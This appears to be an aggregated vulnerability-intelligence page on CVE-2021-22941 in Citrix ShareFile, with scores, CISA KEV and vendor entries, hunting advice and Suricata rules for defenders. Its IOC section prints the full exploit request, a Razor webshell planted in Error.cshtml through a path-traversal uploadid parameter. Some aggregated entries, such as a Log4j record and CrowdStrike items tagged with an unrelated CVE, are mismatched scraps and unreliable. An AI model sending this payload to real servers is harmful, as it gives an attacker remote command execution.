CVE-2021-22941
published 2021-09-23CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWRansomware
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
53.59%
98.9th percentile
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | sharefile | — | — |
| citrix | sharefile_storagezones_controller | < 5.11.20 | 5.11.20 |
| citrix | xenserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123↗
commanduploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}↗
- →Hunt IIS access logs for POST requests to /upload.aspx containing encoded path traversal strings for ../ and ConfigService\Views\Shared\Error.cshtml in URL parameters ↗
- →Flag requests to /upload.aspx that include the default exploit parameters &bp=123&accountid=123, which are present in publicly available CVE-2021-22941 PoC exploits when the attacker has not customized the payload ↗
- →The exploit delivers a Razor-syntax ASP.NET webshell via the uploadid parameter using Process.Start(cmd,arg) for arbitrary command execution; detect creation or modification of Error.cshtml under ConfigService\Views\Shared\ ↗
- →The vulnerability allows an adversary to overwrite an existing file on a target server via an uploadid parameter passed in an HTTP GET request; monitor for unexpected writes to .cshtml files in the ShareFile web root ↗
- ·The default exploit parameters bp=123&accountid=123 are only present when the attacker has not customized the payload; absence of these values does not rule out exploitation ↗
- ·Fully weaponized exploits for CVE-2021-22941 proliferated since mid-October 2021, meaning a wide variety of attacker tooling may produce different request signatures beyond the observed python-requests user agent ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Citrix ShareFile Improper Access Control Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2021-22941 [CRITICAL] CWE-284 Citrix ShareFile Improper Access Control Vulnerability
Vulnerability: Citrix ShareFile Improper Access Control Vulnerability
Affected: Citrix ShareFile
Improper Access Control in Citrix ShareFile storage zones controller may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-22941
Remediation Due Date: 2022-04-15
Citrix
CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the s
vendor_citrix·2021-09-23·CVSS 9.8
CVE-2021-22941 [CRITICAL] CWE-284 CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the s
CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
CISA KEV: Improper Access Control in Citrix ShareFile storage zones controller may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Required Action: Apply updates per vendor instructions.
Known ransomware campaign use.
Citrix
Citrix Security Bulletin CTX328123
vendor_citrix·CVSS 9.8
CVE-2021-22941 [CRITICAL] Citrix Security Bulletin CTX328123
Citrix Security Bulletin CTX328123
CVE References: CVE-2021-22941, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
GHSA
GHSA-83fg-h4qw-7574: Improper Access Control in Citrix ShareFile storage zones controller before 5
ghsa_unreviewed·2022-05-24
CVE-2021-22941 [CRITICAL] CWE-269 GHSA-83fg-h4qw-7574: Improper Access Control in Citrix ShareFile storage zones controller before 5
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
VulnCheck
Apache Log4j2 Remote Code Execution Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
Affected: Apache Log4j2
Required Action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa21-336a; https://api.vulncheck.com/v3/index/sans-dshield?cve=
VulnCheck
Citrix ShareFile Improper Access Control Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-22941 [CRITICAL] CWE-284 Citrix ShareFile Improper Access Control Vulnerability
Citrix ShareFile Improper Access Control Vulnerability
Improper Access Control in Citrix ShareFile storage zones controller may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Affected: Citrix ShareFile
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/; https://socprime.com/blog/cve-2021-22941-citrix-sharefile-remote-code-execution-vulnerability-exploited-by-prophet-spider/; https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/2022-unit42-ransomware-threat-report-final.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://static.tenable.com/m
Suricata
ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)
suricata·2022-01-25·CVSS 9.8
CVE-2021-22941 [CRITICAL] ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)
ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/upload.aspx"; content:"id"; content:"|40|"; distance:0; content:"|2e 2e 2f|"; distance:0; content:"|2e|cshtml"; distance:0; fast_pattern; content:"bp"; content:"accountid"; http.header_names; to_lowercase; content:"|0d 0a|content-type|0d 0a|"; reference:cve,2021-22941; classtype:attempted-admin; sid:2034972; rev:3; metadata:attack_target Server, created_at 2022_01_25, cve CVE_2021_22941, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, ta
Suricata
ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)
suricata·2021-09-27·CVSS 9.8
CVE-2021-22941 [CRITICAL] ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)
ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"upload.aspx"; content:"id=../"; fast_pattern; content:"bp="; content:"accountid="; reference:url,codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html; reference:cve,2021-22941; classtype:attempted-admin; sid:2034033; rev:1; metadata:attack_target Server, created_at 2021_09_27, cve CVE_2021_22941, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_09_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tec
No public exploits indexed.
Greynoiseio
The Sixth Day Of Tagsmas (2023): Citrix ShareFile Remote Code Execution Vulnerability (CVE-2023-24489)
blogs_greynoiseio·CVSS 9.8
[CRITICAL] The Sixth Day Of Tagsmas (2023): Citrix ShareFile Remote Code Execution Vulnerability (CVE-2023-24489)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Wiz
CVE-2026-2701 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2701 [HIGH] CVE-2026-2701 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2701 :
Citrix ShareFile StorageZones Controller vulnerability analysis and mitigation
Authenticated user can upload a malicious file to the server and execute it, which leads to remote code execution.
Source : NVD
## 9.1
Score
Published April 2, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Citrix ShareFile StorageZones Controller
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 40.8
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
cpe:2.3:a:citrix:sharefile_storagezones_controller
Sources
Windows Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploi
Wiz
CVE-2026-2699 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2699 [HIGH] CVE-2026-2699 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2699 :
Citrix ShareFile StorageZones Controller vulnerability analysis and mitigation
Customer Managed ShareFile Storage Zones Controller (SZC) allows an unauthenticated attacker to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.
Source : NVD
## 9.8
Score
Published April 2, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Citrix ShareFile StorageZones Controller
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 61.3
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
cpe:2.3:a:citrix:sharefile_storagezones_controller
Sources
Windows Has Fix Added at: Apr 05, 2026
## Get a
Crowdstrike
PROPHET SPIDER Exploits Citrix ShareFile
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] PROPHET SPIDER Exploits Citrix ShareFile
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
Crowdstrike
PROPHET SPIDER Exploits Citrix ShareFile
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] PROPHET SPIDER Exploits Citrix ShareFile
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
2021-09-23
Published
2022-03-25
Added to CISA KEV
Exploited in the wild